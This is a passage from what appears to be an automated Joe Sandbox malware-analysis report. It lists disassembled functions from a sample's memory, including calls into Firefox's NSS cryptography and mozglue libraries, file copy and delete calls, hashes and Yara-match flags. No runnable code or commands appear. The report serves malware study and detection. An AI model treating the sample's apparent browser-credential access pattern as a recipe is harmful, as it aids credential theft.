                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _freemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3576935931-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C571E10: TlsGetValue.KERNEL32 ref: 6C571E36
                                                                                                                                                                                            • Part of subcall function 6C571E10: EnterCriticalSection.KERNEL32(?,?,?,6C54B1EE,2404110F,?,?), ref: 6C571E4B
                                                                                                                                                                                            • Part of subcall function 6C571E10: PR_Unlock.NSS3 ref: 6C571E76
                                                                                                                                                                                          • free.MOZGLUE(?,6C55D079,00000000,00000001), ref: 6C55CDA5
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C55D079,00000000,00000001), ref: 6C55CDB6
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C55D079,00000000,00000001), ref: 6C55CDCF
                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C55D079,00000000,00000001), ref: 6C55CDE2
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C55CDE9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C5C5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5C5B56
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C2CEC
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2D02
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2D1F
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2D42
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2D5B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C5C5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5C5B56
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C2D9C
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2DB2
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2DCF
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2DF2
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2E0B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C543090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C55AE42), ref: 6C5430AA
                                                                                                                                                                                            • Part of subcall function 6C543090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5430C7
                                                                                                                                                                                            • Part of subcall function 6C543090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5430E5
                                                                                                                                                                                            • Part of subcall function 6C543090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C543116
                                                                                                                                                                                            • Part of subcall function 6C543090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C54312B
                                                                                                                                                                                            • Part of subcall function 6C543090: PK11_DestroyObject.NSS3(?,?), ref: 6C543154
                                                                                                                                                                                            • Part of subcall function 6C543090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C54317E
                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5399FF,?,?,?,?,?,?,?,?,?,6C532D6B,?), ref: 6C55AE67
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5399FF,?,?,?,?,?,?,?,?,?,6C532D6B,?), ref: 6C55AE7E
                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C532D6B,?,?,00000000), ref: 6C55AE89
                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C532D6B,?,?,00000000), ref: 6C55AE96
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C532D6B,?,?), ref: 6C55AEA3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 754562246-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C64A6D8), ref: 6C64AE0D
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C64AE14
                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C64A6D8), ref: 6C64AE36
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C64AE3D
                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6C64A6D8), ref: 6C64AE47
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                          • Opcode ID: 1108bc9353b1ab3d509ea11b0b929ef135d07bd8999e0d4aba15bac789d9b8d1
                                                                                                                                                                                          • Instruction ID: 7ac516f51f917e9fa161f6fc9f99729602e6528837759ee6654c1583387ddffd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1108bc9353b1ab3d509ea11b0b929ef135d07bd8999e0d4aba15bac789d9b8d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BF0C875102A02B7CB009F65E488D577778BE46774B104328E13B83941D736E016D7E9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00046725
                                                                                                                                                                                            • Part of subcall function 00044954: __getptd_noexit.LIBCMT ref: 00044957
                                                                                                                                                                                            • Part of subcall function 00044954: __amsg_exit.LIBCMT ref: 00044964
                                                                                                                                                                                          • __getptd.LIBCMT ref: 0004673C
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0004674A
                                                                                                                                                                                          • __lock.LIBCMT ref: 0004675A
                                                                                                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0004676E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 938513278-0
                                                                                                                                                                                          • Opcode ID: 375ad5f07305081d39901551e496cd10445d2e368cd61fbba22e3dd56979a083
                                                                                                                                                                                          • Instruction ID: 0a1c45064706e56b4498ffed418ac129d4cb476dd4fd1143ba132a686fb32462
                                                                                                                                                                                          • Opcode Fuzzy Hash: 375ad5f07305081d39901551e496cd10445d2e368cd61fbba22e3dd56979a083
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F0F6B2908720ABDB61BB68640779E33E06F00319F11056AF051A71D3EB295800D60E
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C414290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C453EBD,6C453EBD,00000000), ref: 6C4142A9
                                                                                                                                                                                          • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C46B127), ref: 6C46B463
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C46B4C9
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C46B4E4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                          • String ID: pid:
                                                                                                                                                                                          • API String ID: 1720406129-3403741246
                                                                                                                                                                                          • Opcode ID: 348b2281fd8234c4ebe0d88d662b79e9b753837a42ef390e5a1ad6a0496502d1
                                                                                                                                                                                          • Instruction ID: 31c9709bb1abd3910016c230bf84d334d0ba49a2c787c9b229bd18a34ec64f60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 348b2281fd8234c4ebe0d88d662b79e9b753837a42ef390e5a1ad6a0496502d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB311031A012189BDB10DFAAD880EEEB7B9FF44318F54052DE84267F45D732A849DBE1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0003009A
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC0D
                                                                                                                                                                                            • Part of subcall function 0004EBF8: __CxxThrowException@8.LIBCMT ref: 0004EC22
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC33
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00030139
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0003014D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                                          • String ID: vector<T> too long
                                                                                                                                                                                          • API String ID: 2448322171-3788999226
                                                                                                                                                                                          • Opcode ID: 25e147286ccaf25272b557bfd2d537b9237d2e3e7993e486c21dac92a86d708e
                                                                                                                                                                                          • Instruction ID: 0f1189639a2ad661406d6152db9bbc2390c284f52b55d843d0eeaa1ce7cbc60d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e147286ccaf25272b557bfd2d537b9237d2e3e7993e486c21dac92a86d708e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0310B72B413268BDB15EFACEC59AEE77E9E709310F02017AE514EB271D7709D808B51
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C4C6D36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4C6D20
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C4C6D2F
                                                                                                                                                                                          • database corruption, xrefs: 6C4C6D2A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C5FCC7B), ref: 6C5FCD7A
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C5FCD8E
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C5FCDA5
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C5FCDB8
                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C5FCCB5
                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C6914F4,6C6902AC,00000090), ref: 6C5FCCD3
                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C691588,6C6902AC,00000090), ref: 6C5FCD2B
                                                                                                                                                                                            • Part of subcall function 6C519AC0: socket.WSOCK32(?,00000017,6C5199BE), ref: 6C519AE6
                                                                                                                                                                                            • Part of subcall function 6C519AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5199BE), ref: 6C519AFC
                                                                                                                                                                                            • Part of subcall function 6C520590: closesocket.WSOCK32(6C519A8F,?,?,6C519A8F,00000000), ref: 6C520597
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F282
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC0D
                                                                                                                                                                                            • Part of subcall function 0004EBF8: __CxxThrowException@8.LIBCMT ref: 0004EC22
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC33
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F28D
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                                          • API String ID: 1823113695-4289949731
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00032301,?), ref: 00031D6C
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00031D73
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00031D84
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                          • String ID: %hs
                                                                                                                                                                                          • API String ID: 659108358-2783943728
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00021402
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0002140D
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00021416
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceRelease
                                                                                                                                                                                          • String ID: DISPLAY
                                                                                                                                                                                          • API String ID: 1843228801-865373369
                                                                                                                                                                                          • Opcode ID: 19e0c8926b4647f24920bfd99ca1e85e955fb691e2cd7b70e9c85d06ce837546
                                                                                                                                                                                          • Instruction ID: e9340e0bb2eee824e3b9a23c2fb5fde1abdb1acffa75ece104dd3ba3031de864
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e0c8926b4647f24920bfd99ca1e85e955fb691e2cd7b70e9c85d06ce837546
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBD0EA35784344BAF2B01765AD4EF6F2A64ABC6F13F201114FB06A91E48AA81446D626
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C460CD5
                                                                                                                                                                                            • Part of subcall function 6C44F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C44F9A7
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C460D40
                                                                                                                                                                                          • free.MOZGLUE ref: 6C460DCB
                                                                                                                                                                                            • Part of subcall function 6C435E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C435EDB
                                                                                                                                                                                            • Part of subcall function 6C435E90: memset.VCRUNTIME140(ewGl,000000E5,?), ref: 6C435F27
                                                                                                                                                                                            • Part of subcall function 6C435E90: LeaveCriticalSection.KERNEL32(?), ref: 6C435FB2
                                                                                                                                                                                          • free.MOZGLUE ref: 6C460DDD
                                                                                                                                                                                          • free.MOZGLUE ref: 6C460DF2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4069420150-0
                                                                                                                                                                                          • Opcode ID: a78a36a17a5befbd54f6910ce1d92c8783809cbb634086070509a19f44b8012b
                                                                                                                                                                                          • Instruction ID: 785f594285a09023c30247e5f97288df2b39cb35d64a56cd8f87402512b4e028
                                                                                                                                                                                          • Opcode Fuzzy Hash: a78a36a17a5befbd54f6910ce1d92c8783809cbb634086070509a19f44b8012b
                                                                                                                                                                                          • Instruction Fuzzy Hash: E04115719097949BD720DF2AC080F9AFBE5BFC9714F118A2EE8D887B50D7709845CB82
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002B0C6
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B27C
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B297
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002B2E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                          • Opcode ID: 2b70dc7f21d0da7713bc2766be10f809502d1a0ec5c73c75326cfb3b61cee29c
                                                                                                                                                                                          • Instruction ID: 179ecf74358a605fae42c2a385e2d73c6804a6993e743c2deca24c38a35ecaf1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b70dc7f21d0da7713bc2766be10f809502d1a0ec5c73c75326cfb3b61cee29c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5581D832900129EBCF02FBE4ED479DEB775AF14305F614121F904B7167DB60AE8A8BA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 6C435D40
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49F688), ref: 6C435D67
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C435DB4
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49F688), ref: 6C435DED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 557828605-0
                                                                                                                                                                                          • Opcode ID: 8a55d0a0c6cfcf1b55499808a3d4bb6b573d649ea33a6e92eed2a016e3227441
                                                                                                                                                                                          • Instruction ID: fac438344c7a882a1d11910c8b71fa5c41375b28dc049979c6b43e7c242b62ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a55d0a0c6cfcf1b55499808a3d4bb6b573d649ea33a6e92eed2a016e3227441
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02515C71E012398FDF08DFA9C854EAEBBB2FB99304F198619D815A7750C7306D46CB90
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C536C8D
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C536CA9
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C536CC0
                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C658FE0), ref: 6C536CFE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2370200771-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0003C58F,?,00036F27,?), ref: 0003C019
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0003C58F,?,00036F27), ref: 0003C049
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0003C58F,?,00036F27,?), ref: 0003C075
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0003C58F,?,00036F27,?), ref: 0003C083
                                                                                                                                                                                            • Part of subcall function 0003B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,0A0524C0), ref: 0003B9C5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3986731826-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C4582BC,?,?), ref: 6C45649B
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
